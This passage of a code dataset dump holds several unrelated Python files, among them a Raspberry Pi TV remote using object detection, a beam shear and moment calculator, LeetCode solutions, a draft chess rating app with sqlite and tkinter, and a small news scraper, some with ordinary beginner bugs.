max_boxes_to_draw=1,\n min_score_thresh=.5,\n agnostic_mode=False)\n \n truth_rate = detections['detection_scores'][0] #düşük ve algılanmama durumlarını engelleme\n command = detections['detection_classes'][0]+1\n cv2.putText(image_np_with_detections, \"{0:.2f}\".format(int(command)),(30,50),font,1,(255,255,0),2,cv2.LINE_AA) \n resized=cv2.resize(image_np_with_detections, (640,480))\n cv2.imshow('object detection', resized)\n \n threshold1 = 0.75\n threshold2 = 0.6\n \n if channel_digit>0 or changing_digit==1:\n changing_digit=0\n audio.stop()\n \n now= time.time() \n time_difference=(now-back)\n \n if truth_rate2.9 :\n \n if truth_rate>0.3:\n first_tour=1\n \n while len(tv_channel_command) > 0 :\n print(tv_channel_command)\n print(\"basamak: \",channel_digit)\n print(tv_channel_command[0])\n os.system(tv_channel_command[0])\n time.sleep(0.2)\n del 
tv_channel_command[0]\n        tv_channel_command=[] # flush the buffer\n        channel_digit=0\n        \n    elif (truth_rate > threshold1) and time_difference>1.5:\n        tv_channel=give_command(command)\n        print(tv_channel)\n        \n        if command not in [11,12,13,14,15]: # buffer digit keys; non-digit commands are handled below\n            audio=vlc.MediaPlayer(\"/home/pi/Desktop/tsfw/audios/{0}.mp3\".format(tv_channel))\n            audio.play()\n            tv_channel_command.append(lets_change(command))\n            channel_digit+=1\n            back=time.time()\n            \n        \n        elif tv_channel_command== [] : # a channel/volume command arrived while the buffer is empty\n            print(command)\n            audio=vlc.MediaPlayer(\"/home/pi/Desktop/tsfw/audios/{0}.mp3\".format(tv_channel))\n            audio.play()\n            changing_digit=1\n            os.system(lets_change(command)) \n\n        \n    elif truth_rate < threshold1 and truth_rate > threshold2 and time_difference>1.5 :\n        #print('small')\n        \n        if(first_tour == 0): # not the first check\n            if(command == old_command)and command!=0 : # compare with the remembered command\n                \n                old_command=0 # reset - do not store to memory this round\n                tv_channel=give_command(command)\n                print('hafizali', old_truth, truth_rate, tv_channel)\n                if command not in [11,12,13,14,15]: \n                    audio=vlc.MediaPlayer(\"/home/pi/Desktop/tsfw/audios/{0}.mp3\".format(tv_channel))\n                    audio.play()\n                    tv_channel_command.append(lets_change(command))\n                    \n                    channel_digit+=1\n                    back=time.time()\n                    \n                elif tv_channel_command==[] : \n                    print(command)\n                    audio=vlc.MediaPlayer(\"/home/pi/Desktop/tsfw/audios/{0}.mp3\".format(tv_channel))\n                    audio.play()\n                    changing_digit=1\n                    os.system(lets_change(command))\n                \n                \n            else: # two low-confidence detections that do not match: discard\n                first_tour=1 # rebuild the memory\n        \n        if(first_tour == 1):\n            old_command = command\n            old_truth = truth_rate\n            first_tour=0 # keep in memory\n            \n            \n    \n    key = cv2.waitKey(1) & 0xFF\n    \n    rawCapture.truncate(0)\n    \n    if key == ord(\"q\"): \n        break\n","sub_path":"TV_REMOTE.py","file_name":"TV_REMOTE.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"616449708","text":"\"\"\"repository templates for manager utils\"\"\"\n\n\nclass RepositoryProfile:\n\n    import_statements_pattern = [\n        'from ..type.objects import TypeList',\n        'from ..osid.osid_errors import NullArgument',\n    ]\n\n    get_coordinate_types_template = \"\"\"\n        return TypeList([])\"\"\"\n\n    supports_coordinate_type_template = \"\"\"\n        if ${arg0_name} is None:\n            raise NullArgument()\n        return False\"\"\"\n","sub_path":"managerutil_templates/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"226082043","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nclass Beam:\n\n    def __init__(self, length, supports, loads):\n        self.length = length\n        self.supports = supports\n        self.loads = loads\n\n    def calculate_reaction_loads(self):\n        \"\"\"\n        This function calculates the reaction forces from the given supports and loads\n        \"\"\"\n        load_force = 0\n        load_moments = 0\n        #This segment of code adds up all of the known forces and moments to put them into our equilibrium equation\n        for load in self.loads:\n            if load.type == \"point\":\n                load_force+=load.load_force\n            else:\n                load_force+=load.get_resultant(load.location[0],load.location[1])\n        for load in self.loads:\n            if load.type == \"point\":\n                load_moments += load.load_force*load.location\n            else:\n                load_moments += load.get_resultant(load.location[0],load.location[1])*load.get_centroid(load.location[0], 
load.location[1])\n #This if statement checks for the two different cases: one fixed support or two roller supports\n if len(self.supports) > 1:\n #This if statement sets up, solves, and stores the system of equilibrium equations for two rollers (two forces are stored)\n left_hand = [[1, 1],[self.supports[0].location, self.supports[1].location]]\n left_hand = np.asarray(left_hand)\n right_hand = np.asarray([-load_force, -load_moments])\n reaction_forces = np.linalg.solve(left_hand, right_hand)\n self.supports[0].reaction_force = reaction_forces[0]\n self.supports[1].reaction_force = reaction_forces[1]\n print(\"Reaction forces (N)\")\n print(reaction_forces)\n else:\n #This if statement sets up, solves, and stores the system of equilibrium equations for one fixed support (one force and one moment are stored)\n left_hand = np.asarray([[1,0],[self.supports[0].location, 1]])\n right_hand = np.asarray([-load_force, -load_moments])\n reactions = np.linalg.solve(left_hand, right_hand)\n self.supports[0].reaction_force = reactions[0]\n self.supports[0].reaction_moment = reactions[1]\n print(\"Reaction force (N) and moment (Nm)\")\n print(reactions)\n\n def calc_shear_force(self):\n \"\"\"\n This function calculates the shear forces for the beam\n \"\"\"\n x = []\n i = 0\n while i<=self.length:\n x.append(i)\n i+=.01\n y = []\n #This for loop traverses along the beam and calculates the shear force at each .01 m interval\n for loc in x:\n force_sum = 0\n for load in self.loads:\n if load.type == \"point\":\n #If the load is a point load, just add the forces\n if load.location < loc:\n force_sum += load.load_force\n else:\n if (load.location[0] < loc) & (load.location[1] < loc):\n #This if statement uses the resultant force from the distributed load\n #if the distributed load is fully inside length we are looking at\n force_sum += load.get_resultant(load.location[0],load.location[1])\n elif (load.location[0] < loc):\n #This if statement is for cases when we are slicing the beam in the middle of a distributed load\n force_sum += load.get_resultant(load.location[0],loc)\n for support in self.supports:\n if support.location < loc:\n force_sum += support.reaction_force\n y.append(force_sum)\n #using matplotlib to plot the length versus shear force\n plot1 = plt.figure(1)\n plt.title(\"Shear Force Diagram\")\n plt.plot(x,y)\n plt.xlabel(\"Distance (m)\")\n plt.ylabel(\"Shear Force (N)\")\n\n def calc_bending_moment(self):\n \"\"\"\n This function calculates the bending moments for the beam\n \"\"\"\n x = []\n i = 0\n while i <= self.length:\n x.append(i)\n i+=.01\n x.append(self.length)\n y = []\n for loc in x:\n moment_sum = 0\n for load in self.loads:\n if load.type == \"point\":\n #Calculates and adds moment to total for each load if load is within the length of the beam we are looking at\n if load.location < loc:\n moment_sum += load.load_force*(loc-load.location)\n else:\n #Calculates and adds moment to total for each distributed load if load is within the length of the beam we are looking at\n #Using centroid and resultant means we can treat the uneven and even distributed loads the same here\n if (load.location[0] < loc) & (load.location[1] < loc):\n moment_sum += load.get_resultant(load.location[0],load.location[1])*(loc-load.get_centroid(load.location[0], load.location[1]))\n #Case for where we are slicing in the middle of the distributed load\n elif(load.location[0] < loc):\n moment_sum += load.get_resultant(load.location[0],loc)*(loc-(load.get_centroid(load.location[0], loc)))\n for support in 
self.supports:\n                if support.location < loc:\n                    moment_sum += support.reaction_force*(loc-support.location)\n                    moment_sum -= support.reaction_moment\n            y.append(moment_sum)\n        #Plot the moments\n        plot2 = plt.figure(2)\n        plt.plot(x,y)\n        plt.title(\"Bending Moment Diagram\")\n        plt.xlabel(\"Distance (m)\")\n        plt.ylabel(\"Bending Moment (Nm)\")\n","sub_path":"beam.py","file_name":"beam.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"177541899","text":"import datetime\nimport random\nimport run_step\nimport transfer_data\n\ndef get_uniquetablename():\n    return 'user{0}'.format(datetime.datetime.now().microsecond + (random.randrange(1, 100+1) * 100000))\n\ndef run_simple(algorithm, global_node, local_nodes, localtable, globaltable, viewlocaltable):\n    try:\n        run_step.run_local(local_nodes,localtable, algorithm, viewlocaltable)\n        transfer_data.merge(global_node, local_nodes, localtable, globaltable)\n        result = run_step.run_global_final(global_node, globaltable, algorithm)\n    except:\n        run_step.clean_up(global_node,local_nodes, globaltable,localtable)\n        raise\n    run_step.clean_up(global_node,local_nodes, globaltable,localtable)\n    return result\n    \ndef run_iterative(algorithm, global_node, local_nodes, localtable, globaltable, globalresulttable, viewlocaltable):\n    j = 0\n    try:\n        run_step.run_local_init(local_nodes,localtable, algorithm, viewlocaltable)\n        j+=1\n        for i in range(20):\n            transfer_data.merge(global_node, local_nodes, localtable, globaltable)\n\n            run_step.run_global_iter(global_node, local_nodes, globaltable, localtable, globalresulttable, algorithm, viewlocaltable)\n            j+=1\n\n            transfer_data.broadcast(global_node, local_nodes, globalresulttable)\n\n            run_step.run_local_iter(local_nodes,localtable, globalresulttable, algorithm, viewlocaltable)\n            j+=1\n\n        transfer_data.merge(global_node, local_nodes, localtable, globaltable)\n        result = run_step.run_global_final(global_node, globaltable, algorithm)\n        j+=1\n        print(j)\n    except:\n        run_step.clean_up(global_node,local_nodes, globaltable,localtable, viewlocaltable,globalresulttable )\n        raise\n    \n    \n    run_step.clean_up(global_node,local_nodes, globaltable,localtable, viewlocaltable, globalresulttable)\n    \n    return result\n\n\ndef run(algorithm, params, global_node, local_nodes):\n    \n    table_id = get_uniquetablename()\n    localtable = \"local\"+table_id\n    globaltable = \"global\"+table_id\n    viewlocaltable = 'localview'+table_id\n    globalresulttable = \"globalres\"+table_id\n    ## create viewlocaltable with params\n    run_step.createlocalviews(local_nodes, viewlocaltable,params)\n    ### check algorithm category\n\n    #return run_simple(algorithm, global_node, local_nodes, localtable, globaltable, viewlocaltable)\n    return run_iterative(algorithm,global_node, local_nodes, localtable, globaltable, globalresulttable, viewlocaltable)\n    \n    \n","sub_path":"run_algorithm.py","file_name":"run_algorithm.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"642395413","text":"\"\"\"\nProblem2 (https://leetcode.com/problems/01-matrix/)\nGiven a matrix consisting of 0 and 1, find the distance of the nearest 0 for each cell.\n\nThe distance between two adjacent cells is 1.\n\nExample 1:\nInput:\n0 0 0\n0 1 0\n0 0 0\n\nOutput:\n0 0 0\n0 1 0\n0 0 0\n\nExample 2:\nInput:\n0 0 0\n0 1 0\n1 1 1\n\nOutput:\n0 0 0\n0 1 0\n1 2 1\n\nTIME- O(n*m)\nSPACE- 
O(n*m)\nLEETCODE - Yes\n\n\"\"\"\nfrom typing import List\nimport collections\n\n# BFS: convert all 1's to infinity and append all zeros into the queue,\n# then pop from the queue and use the directions array to relax neighbor distances\nclass Solution:\n    def updateMatrix(self, matrix: List[List[int]]) -> List[List[int]]:\n        if matrix is None or len(matrix) == 0:\n            return matrix\n        m = len(matrix)\n        n = len(matrix[0])\n        q = collections.deque()\n        for i in range(m):\n            for j in range(n):\n                if matrix[i][j] == 1:\n                    matrix[i][j] = float('inf')\n                else:\n                    q.append([i, j]) # when found 0 add the position to q\n\n        directions = [[0, 1], [1, 0], [-1, 0], [0, -1]] #direction array\n        while q: # BFS over the grid, level by level\n            size = len(q)\n            for i in range(size):\n                root = q.popleft()\n                root_i = root[0]\n                root_j = root[1]\n                for direc in directions:\n                    r = root_i + direc[0]\n                    c = root_j + direc[1]\n                    # current element matrix[root_i][root_j]\n                    # new element matrix[r][c]\n                    if r < m and r >= 0 and c < n and c >= 0 and matrix[root_i][root_j] + 1 < matrix[r][c]:\n                        q.append([r, c]) #ADD TO QUEUE if matrix[root_i][root_j] + 1 (current distance) < new distance\n\n                        matrix[r][c] = matrix[root_i][root_j] + 1 # change the distance of new element\n        return matrix\n\n\n","sub_path":"Problem-2.py","file_name":"Problem-2.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"265115204","text":"# chess objects and functions\n\n# utf-8\n\n\"\"\"\nRemake of an old chess calculator I made back in 1998\n\"\"\"\nimport tkinter as tk\nimport sqlite3\n# import wrapper_sqlite3\n\nconn = sqlite3.connect(\"data\\\\chess.db\")\n\n\n# function for rebuilding the database to zero ##############################\ndef rebuild():\n    curs = conn.cursor()\n    SQLscript = \"\"\n    with open('chess.db.sql', 'r') as f:\n        SQLscript = f.read()  # executescript expects a single string, not a list of lines\n    curs.executescript(SQLscript)\n\n\n# object for managing players ###############################################\nclass Player(object):\n    def __init__(self, **kwargs):\n        self.ID = kwargs.get('ID', \"\")\n        self.name = kwargs.get('name', \"\")\n        self.score = kwargs.get('score', 1000)\n        self.games_played = kwargs.get('games_played', 0)\n        # players with few recorded games are provisional and get larger rating swings\n        self.provisional = self.games_played < 10\n\n    def calculate(self, **kwargs):\n        \"\"\" calculate this player's new score \"\"\"\n        I_Won = kwargs.get('I_Won', False)\n        opponent_score = kwargs.get('opponent_score', 1000)\n        winner = 1 if I_Won else -1\n        winner *= 10 if self.provisional else 1\n        self.games_played += 1\n        self.score += int(abs(self.score-opponent_score)/10 * winner)\n\n\n# object for managing games #################################################\nclass game(object):\n    def __init__(self):\n        self.p_WHITE = None\n        self.p_BLACK = None\n        # result is 0 for tie, 1 for WHITE and 2 for BLACK\n        self.result = None\n\n\n# object for main application window ########################################\nclass Application(tk.Frame):\n    def __init__(self, master):\n        super(Application, self).__init__(master)\n        self.curs = conn.cursor()\n        self.grid()\n        self.create_widgets()\n\n    def create_player(self, ID):\n        SQL = \"\"\"SELECT * FROM players\n                 WHERE ID = ?;\"\"\"\n\n        # bind the id instead of leaving a bare placeholder in the SQL text\n        data = self.curs.execute(SQL, (ID,)).fetchall()\n\n        temp = Player(ID=int(data[0][0]),\n                      name=data[0][1],\n                      score=int(data[0][2]),\n                      games_played=int(data[0][3]))\n        return temp\n\n    def save(self, temp):\n        SQL = \"\"\" UPDATE players SET score = ?, games_played = ?,\n                  provisional = ? WHERE ID = ?;\"\"\"\n        # bind values instead of %-interpolating them into the statement\n        self.curs.execute(SQL, (temp.score, temp.games_played, int(temp.provisional), temp.ID))\n        conn.commit()\n\n    def 
create_widgets(self):\n menubar = tk.Menu(self)\n filemenu = tk.Menu(menubar)\n filemenu.add_command(label='New Player', command=self.new_Player)\n filemenu.add_command(label='New Game', command=self.new_Game)\n\n filemenu.add_command(label='Save', command=self.save)\n filemenu.add_command(label='Reset', command=self.clear)\n\n menubar.add_cascade(label='File', menu=filemenu)\n menubar.add_command(label='Quit', command=tk.root.quit)\n\n self.lbl_1 = tk.Label(self, text='The Bowling Calculator')\n self.lbl_1.grid(row=0, columnspan=3)\n\n self.lbl_2 = tk.Label(self, text='Enter score from game 1 ')\n self.lbl_3 = tk.Label(self, text='Enter score from game 2 ')\n self.lbl_4 = tk.Label(self, text='Enter score from game 3 ')\n self.lbl_5 = tk.Label(self, text='Average:')\n self.lbl_2.grid(row=2, column=0)\n self.lbl_3.grid(row=3, column=0)\n self.lbl_4.grid(row=4, column=0)\n self.lbl_5.grid(row=5, column=0)\n\n self.score_1 = tk.Entry(self)\n self.score_2 = tk.Entry(self)\n self.score_3 = tk.Entry(self)\n self.avg = tk.Entry(self)\n self.score_1.grid(row=2, column=1)\n self.score_2.grid(row=3, column=1)\n self.score_3.grid(row=4, column=1)\n self.avg.grid(row=5, column=1)\n\n self.btn_1 = tk.Button(self, text='Calculate Average',\n command=self.calculate)\n self.btn_2 = tk.Button(self, text='Clear Result', command=self.clear)\n self.btn_1.grid(row=6, column=0)\n self.btn_2.grid(row=6, column=1)\n\n self.score_1.focus_set()\n tk.root.config(menu=menubar)\n\n def calculate(self):\n numScore_1 = int(self.score_1.get())\n numScore_2 = int(self.score_2.get())\n numScore_3 = int(self.score_3.get())\n total = numScore_1 + numScore_2 + numScore_3\n average = total / 3\n\n strAverage = \"{0:.2f}\".format(average)\n self.avg.insert(0, strAverage)\n\n def clear(self):\n self.score_1.delete(0, tk.END)\n self.score_2.delete(0, tk.END)\n self.score_3.delete(0, tk.END)\n self.avg.delete(0, tk.END)\n self.score_1.focus_set()\n\n\n# object for main application window ########################################\nclass choose_player(tk.Frame):\n def __init__(self, master, position):\n super(Application, self).__init__(master)\n self.curs = conn.cursor()\n self.grid()\n self.create_widgets()\n self.position = position\n\n def create_widgets(self):\n SQL = \"\"\" SELECT ID, name FROM players;\"\"\"\n data = self.curs.execute(SQL).fetchall()\n names = data[0]\n listheight = len(names) if len(names) < 10 else 10\n\n self.lbl_1 = tk.Label(self, text='Choose a Player')\n self.lbl_1.grid(row=0, column=0, sticky=W+E)\n self.lst_players = tk.List(self, selecttype=tk.SINGLE,\n height=listheight)\n self.lst_players.grid(row=1, column=0, sticky=W+E)\n\n for name in names:\n self.lst_players.insert(tk.END, name)\n\n\n\"\"\" end \"\"\"\n","sub_path":"ChessCalc/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"77256544","text":"import sys\nfrom search import *\nfrom repo_search import RepoSearch\nfrom contribution_search import ContributionSearch\nfrom code_search import CodeSearch\nfrom issue_search import IssueSearch\n\ndef search():\n # remove gitsearch from the list of args\n args = sys.argv[1:]\n search = None\n\n search_dict = {\n \"repos\": RepoSearch,\n \"contributions\": ContributionSearch,\n \"issues\": IssueSearch,\n \"code\": CodeSearch\n }\n\n if len(args) == 0 or args[0] not in ['repos', 'contributions', \n 'issues', 'code']:\n raise BadArgsException(\"The first arguement passed must be 
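# Note on ChessCalc/func.py above: Player.calculate updates self.my_score,
# which __init__ never defines (it sets self.score), and flags players with
# MORE than 10 games as provisional. A hedged sketch of the presumably intended
# rule, assuming "provisional" means fewer than 10 games played:
class PlayerSketch:
    def __init__(self, score=1000, games_played=0):
        self.score = score
        self.games_played = games_played

    def calculate(self, I_Won=False, opponent_score=1000):
        sign = 1 if I_Won else -1
        k = 10 if self.games_played < 10 else 1  # provisional ratings move faster
        self.games_played += 1
        self.score += int(abs(self.score - opponent_score) / 10 * sign * k)

p = PlayerSketch()
p.calculate(I_Won=True, opponent_score=1200)
print(p.score, p.games_played)  # 1200 1 -- i.e. 1000 + int(200/10 * 1 * 10)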
either \" +\\\n \"'repos', 'contributions', 'issues' or 'code'\")\n else:\n search = search_dict[args[0]](args=args[1:], kwargs=None)\n search.print_data()\n","sub_path":"gitsearch/_main.py","file_name":"_main.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"221453559","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\nimport numpy as np\nimport matplotlib.cm as cm\nimport PIL.Image as Image\nfrom scipy.misc import imresize\n\n\ndef create_jpeg(img, output_filename):\n jet = cm.get_cmap('jet')\n mn = np.min(img)\n mx = np.max(img)\n img = img - mn\n img = img*(1.0)/((mx-mn)*(1.0))\n img = np.maximum(0.0, np.minimum(1.0, img))\n img = jet(img[0,:,:,0])[:,:,0:3]\n print(img.shape)\n #raw_input(\"see above\")\n img *= 255.0\n img = np.uint8(img)\n print(img)\n print(img.shape)\n print(img.dtype)\n print(img.shape)\n #raw_input(\"what do we see?\")\n img = Image.fromarray(img)\n img.save(output_filename)\n print(\"saved %s\" % output_filename)\n\ndef is_closed_five_point_box(points):\n assert len(points)==5\n ptA = points[0]\n # need to finish\n return True\n\ndef prep_img_for_vgg16(img, mean_to_subtract=None, interp='lanczos'):\n # resize options are here: https://docs.scipy.org/doc/scipy/reference/generated/scipy.misc.imresize.html\n #dest = np.empty((224,224,3), dtype=np.float32)\n dest = img\n #if img.dtype != np.float32:\n # img = img.astype(np.float32)\n\n #assert len(img.shape)==2\n\n #if img.shape != (224, 224):\n # img = imresize(img, (224,224), interp=interp, mode='F')\n\n orig_resized_mean = np.mean(img)\n\n #if mean_to_subtract is None:\n # mean_to_subtract = orig_resized_mean\n\n #img -= mean_to_subtract\n\n #for ch in range(3):\n # dest[:,:,ch]=img[:,:]\n \n #dest = np.expand_dims(dest, axis=0)\n return dest, orig_resized_mean\n","sub_path":"sslearnpipeline/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"272390585","text":"import numpy as np\nfrom scipy.spatial import ConvexHull\n\n\nclass DataGenerator(object):\n def __init__(self):\n \"\"\"Construct a DataGenerator.\"\"\"\n pass\n\n def next_batch(self, batch_size, N, train_mode=True, convex_hull=False):\n \"\"\"Return the next batch of the data\"\"\"\n # If training on the convex hull problem: sequence of random points from [0, 1] x [0, 1]\n # If training on the sorting problem: sequence of random real numbers in [0, 1]\n reader_input_batch = []\n\n # Sorted sequence that we feed to encoder\n # In inference we feed an unordered sequence again\n decoder_input_batch = []\n\n # Ordered sequence where one hot vector encodes position in the input array\n writer_outputs_batch = []\n olen=N\n if convex_hull:\n for _ in range(N):\n reader_input_batch.append(np.zeros([batch_size, 2]))\n for _ in range(N + 1):\n decoder_input_batch.append(np.zeros([batch_size, 2]))\n writer_outputs_batch.append(np.zeros([batch_size, N + 1]))#ground truth one-hot\n\n for b in range(batch_size):\n sequence = np.random.rand(N, 2)\n leftmost_point = np.argmin(sequence[:, 0])\n hull = ConvexHull(sequence)\n v = hull.vertices\n v = np.roll(v, -list(v).index(leftmost_point)) # start from leftmost point\n for i in range(N):\n reader_input_batch[i][b] = sequence[i]\n\n for i in range(len(v)):\n if train_mode:\n decoder_input_batch[i + 1][b] = 
sequence[v[i]]#enforcing training\n else:\n decoder_input_batch[i + 1][b] = sequence[i]\n writer_outputs_batch[i][b, v[i]+1 ] = 1#correct convex hull point\n\n # Write the stop symbol\n for i in range(len(v), N):\n writer_outputs_batch[i][b, 0] = 1\n if not train_mode:\n decoder_input_batch[i + 1][b] = sequence[i]\n writer_outputs_batch[N][b, 0] = 1\n olen = len(v)\n else:\n\n for _ in range(N):\n reader_input_batch.append(np.zeros([batch_size, 1]))\n for _ in range(N + 1):\n decoder_input_batch.append(np.zeros([batch_size, 1]))\n writer_outputs_batch.append(np.zeros([batch_size, N + 1]))\n\n for b in range(batch_size):\n shuffle = np.random.permutation(N)\n sequence = np.sort(np.random.random(N))\n shuffled_sequence = sequence[shuffle]\n\n for i in range(N):\n reader_input_batch[i][b] = shuffled_sequence[i]\n if train_mode:\n decoder_input_batch[i + 1][b] = sequence[i]\n else:\n decoder_input_batch[i + 1][b] = shuffled_sequence[i]\n writer_outputs_batch[shuffle[i]][b, i + 1] = 1\n\n # Points to the stop symbol\n writer_outputs_batch[N][b, 0] = 1\n\n # size is seq_len x batch x dim\n # input for encoder, input for decoder, output\n return reader_input_batch, decoder_input_batch, writer_outputs_batch, olen\nimport sys\nimport pickle\ndef llprint(message):\n sys.stdout.write(message)\n sys.stdout.flush()\n\ndef dump_convex_hull(length_from, length_to, num_samples):\n dataset = DataGenerator()\n all_samples=[]\n for i in range(num_samples):\n ll = np.random.randint(length_from, length_to + 1)\n r, d, w, olen = dataset.next_batch(1, ll, train_mode=True, convex_hull=True)\n all_samples.append((r,d,w,olen))\n llprint('\\r{}/{}'.format(i,num_samples))\n print('start dump..')\n pickle.dump(all_samples, open('./data/convex_hull/train-l50.pkl','wb'))\n\n\nif __name__ == \"__main__\":\n # dataset = DataGenerator()\n # r, d, w, olen = dataset.next_batch(1, 5, train_mode=False, convex_hull=True)\n # print(\"Reader: \", r)\n # print(\"Decoder: \", d)\n # print(\"Writer: \", w)\n\n dump_convex_hull(50,50,100000)","sub_path":"gen-dnc/pointer_task/preppare_comb_problem.py","file_name":"preppare_comb_problem.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249872231","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\n\n#contactForm imported into the view\nfrom .forms import ContactForm\n\n# Create your views here.\ndef contact(request):\n\ttitle = 'Contact Us'\n\t#The view also need to handle the contactForm so,\n\tform = ContactForm(request.POST or None)\n\tconfirm_message = None\n\tif form.is_valid():\n\t\tname = form.cleaned_data['name']\n\t\tcomment = form.cleaned_data['comment']\n\t\tsubject = 'Message from MYSITE.com'\n\t\tmessage = '%s %s' %(comment,name)\n\t\t#Ensures that the Email from is\n\t\t#That email that a user fills in the contactForm\n\t\temailFrom = form.cleaned_data['email']\n\t\temailTo = [settings.EMAIL_HOST_USER]\n\t\tsend_mail(subject, message, emailFrom, emailTo, fail_silently = True)\n\t\ttitle = \"Thanks!\"\n\t\tconfirm_message = \"Thanks for the message we will get back right to you.\"\n\t\tform = None\n\n\tcontext = {'title': title, 'form': form, 'confirm_message': confirm_message, }\n\ttemplate='contact.html'\n\treturn render(request, template, 
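# The DataGenerator above rotates the hull vertex list so the walk starts at
# the leftmost point via np.roll. A tiny standalone illustration of that trick
# (the leftmost input point always lies on the convex hull, so index() is safe):
import numpy as np
from scipy.spatial import ConvexHull

rng = np.random.default_rng(0)
pts = rng.random((8, 2))
v = ConvexHull(pts).vertices                 # counter-clockwise vertex indices
leftmost = np.argmin(pts[:, 0])              # index of the leftmost input point
v = np.roll(v, -list(v).index(leftmost))     # rotate so the walk starts there
assert v[0] == leftmost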
context)","sub_path":"lalaespace/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"215316946","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef start():\n GetNews('Газпром')\n\n\n\ndef GetNews(search_text):\n resp = requests.get('http://mediametrics.ru/search/week.html#ru:tm:'+search_text)\n with open('./index.html','w') as f:\n f.write(str(resp.content))\n\n html_page = BeautifulSoup(resp.content,'html.parser')\n allnews = html_page.find('div',id='news').find_all('div', class_='rs-link')\n print(allnews)\n\nif __name__ == '__main__':\n start() ","sub_path":"news_scrapper.py","file_name":"news_scrapper.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"577186508","text":"\"\"\"\nGiven an unsorted array of integers, find the length of the longest\nconsequtive elements sequence.\n\nGiven [100, 4, 200, 1, 3, 2]\nthe longest consecqutive elements squence is [1, 2, 3, 4]\nreturn is 4\n\nSolve it in O(n) complexity\n\"\"\"\nclass Solution(object):\n def longestConsecutive(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums :\n return 0\n dic = dict()\n for n in nums:\n if n not in dic:\n dic[n] = 1\n res = 1\n for n in nums:\n current = 1\n if n not in dic :\n continue\n while n - 1 in dic :\n n -= 1\n del dic[n]\n while n + i in dic:\n n += 1\n current += 1\n del dic[n]\n res = max(res, current)\n return res","sub_path":"Array/128-Longest Consecutive Sequence/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"481750360","text":"\"\"\"Typing module.\"\"\"\n\nimport abc\nimport itertools\nfrom typing import Any, Callable, List, Optional, Protocol, Sequence, TypeVar, Union\n\nimport numpy as np\nimport numpy.typing as npt\n\nfrom skrough.structs.description_node import DescriptionNode\nfrom skrough.structs.state import ProcessingState\n\n# Chaos measures\nChaosMeasureReturnType = float\n# \"\"\"Return type of chaos measure functions.\"\"\"\nChaosMeasure = Callable[[np.ndarray, int], ChaosMeasureReturnType]\n# \"\"\"A type/signature of chaos measure functions.\"\"\"\n\n\n# Random\nSeed = Optional[Union[int, np.random.SeedSequence, np.random.Generator]]\n# \"\"\"A type for values which can be used as a random seed.\"\"\"\n\n\n# Collections\nElements = Union[Sequence, np.ndarray]\nLocations = npt.NDArray[np.int64]\nLocationsLike = Union[Sequence[int], Locations]\n\nT = TypeVar(\"T\")\nOneOrSequence = Union[\n T,\n Sequence[T],\n]\n\n\n# Predict strategy\nclass PredictStrategyFunction(Protocol):\n @abc.abstractmethod\n def __call__(\n self,\n reference_ids: np.ndarray,\n reference_data_y: np.ndarray,\n predict_ids: np.ndarray,\n seed: Seed = None,\n ) -> Any:\n raise NotImplementedError\n\n\n# no-answer strategy - what should be the answer when a classifier \"do not know\"\nclass NoAnswerStrategyFunction(Protocol):\n @abc.abstractmethod\n def __call__(\n self,\n reference_data_y: np.ndarray,\n seed: Seed = None,\n ) -> Any:\n raise NotImplementedError\n\n\n# Permutation strategy\nclass ObjsAttrsPermutationStrategyFunction(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n n_objs: int,\n n_attrs: int,\n objs_weights: Optional[Union[int, float, np.ndarray]] = None,\n attrs_weights: 
